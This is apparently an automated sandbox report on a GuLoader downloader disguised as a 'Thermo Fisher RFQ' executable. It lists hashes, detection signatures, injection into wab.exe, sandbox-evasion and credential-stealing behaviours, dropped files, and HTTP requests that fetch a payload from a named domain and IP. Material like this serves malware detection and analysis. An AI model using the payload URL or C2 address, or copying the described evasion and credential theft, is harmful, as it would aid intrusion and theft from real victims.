Edit tour

Windows Analysis Report
Thermo Fisher RFQ_TFS-1207.com.exe

Overview

General Information

Sample name:	Thermo Fisher RFQ_TFS-1207.com.exe
Analysis ID:	1501414
MD5:	9768c048c979aeeeeb051574d452b626
SHA1:	414d48d77fc71d29e58a92d02fa2d770fb854339
SHA256:	19b8eabc143b4307a4496fec6012965f918e18d0e33a989292568f37a4c5f1ba
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Thermo Fisher RFQ_TFS-1207.com.exe (PID: 2400 cmdline: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe" MD5: 9768C048C979AEEEEB051574D452B626)

wab.exe (PID: 2668 cmdline: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 2668	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 199.217.106.226

Timestamp:	2024-08-29T21:56:43.611985+0200
SID:	2803270
Severity:	2
Source Port:	49838
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://synergyinnovationsgroup.com/	Avira URL Cloud: Label: phishing
Source: https://synergyinnovationsgroup.com/wPKxzs124.bin	Avira URL Cloud: Label: phishing
Source: https://synergyinnovationsgroup.com/wPKxzs124.bint#	Avira URL Cloud: Label: phishing
Source: https://synergyinnovationsgroup.com/B	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: Thermo Fisher RFQ_TFS-1207.com.exe

ReversingLabs: Detection: 50%

Machine Learning detection for sample

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Joe Sandbox ML: detected

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 199.217.106.226:443 -> 192.168.11.20:49838 version: TLS 1.2

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405C60
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,	0_2_004068B1

Source: Joe Sandbox View

IP Address: 199.217.106.226 199.217.106.226

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49838 -> 199.217.106.226:443

Source: global traffic

HTTP traffic detected: GET /wPKxzs124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: synergyinnovationsgroup.comCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /wPKxzs124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: synergyinnovationsgroup.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: synergyinnovationsgroup.com

Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodo
Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000000.86449721470.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://synergyinnovationsgroup.com/
Source: wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://synergyinnovationsgroup.com/B
Source: wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91556338444.00000000371E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://synergyinnovationsgroup.com/wPKxzs124.bin
Source: wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://synergyinnovationsgroup.com/wPKxzs124.bint#

Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838

Source: unknown

HTTPS traffic detected: 199.217.106.226:443 -> 192.168.11.20:49838 version: TLS 1.2

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_00405718 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405718

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Thermo Fisher RFQ_TFS-1207.com.exe

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_0040352F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040352F

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_6FE71BFF	0_2_6FE71BFF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029A4A98	2_2_029A4A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029A9B38	2_2_029A9B38
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029A3E80	2_2_029A3E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029A41C8	2_2_029A41C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029AB324	2_2_029AB324
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029AD168	2_2_029AD168

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/13@1/1

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

0_2_0040352F

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_004049C4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,

0_2_004049C4

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,

0_2_004021CF

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

File created: C:\Users\user\AppData\Local\Temp\nsj4B37.tmp

Jump to behavior

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Thermo Fisher RFQ_TFS-1207.com.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

File read: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Thermo Fisher RFQ_TFS-1207.com.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_6FE71BFF LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FE71BFF

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_6FE730C0 push eax; ret	0_2_6FE730EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029AA060 push E8FFFFF7h; retf	2_2_029AA065
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 2_2_029A0C6D push edi; retf	2_2_029A0C7A

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	File created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	File created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	File created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	File created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	File created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
